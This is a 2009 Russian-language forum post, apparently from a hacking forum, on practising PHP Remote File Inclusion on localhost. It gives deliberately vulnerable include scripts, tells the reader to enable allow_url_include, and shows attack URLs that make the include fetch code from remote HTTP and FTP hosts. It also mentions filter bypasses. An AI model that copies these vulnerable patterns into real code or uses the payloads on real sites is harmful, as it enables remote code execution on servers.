11.11.2009, 01:11
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
2B1t.exe, омг.
PHP код:
<?
Include ("$page.php");
?>
Точки забыл убрать)
Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена.
Затем можешь заюзать такой скриптек:
PHP код:
<?
$inc = $_GET['file'];
include ($inc);
?>
И реализовуй:
Код:
localhost/script.php?file=http://google.com
Затем постепенно усложняй:
PHP код:
<?
$inc = $_GET['file'];
if(file_exists($inc))
{
include ($inc);
}
else
{
echo 'ERROR!';
}
?>
И снова реализовуй:
Код:
localhost/script.php?file=ftp://login:pass@host/file.php
И так далее.
Так же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w:
https://forum.antichat.ru/thread106780.html
По аналогии и с ЛФИ, нy кароче ты понял)
Последний раз редактировалось Ins3t; 11.11.2009 в 01:17..
|
|
|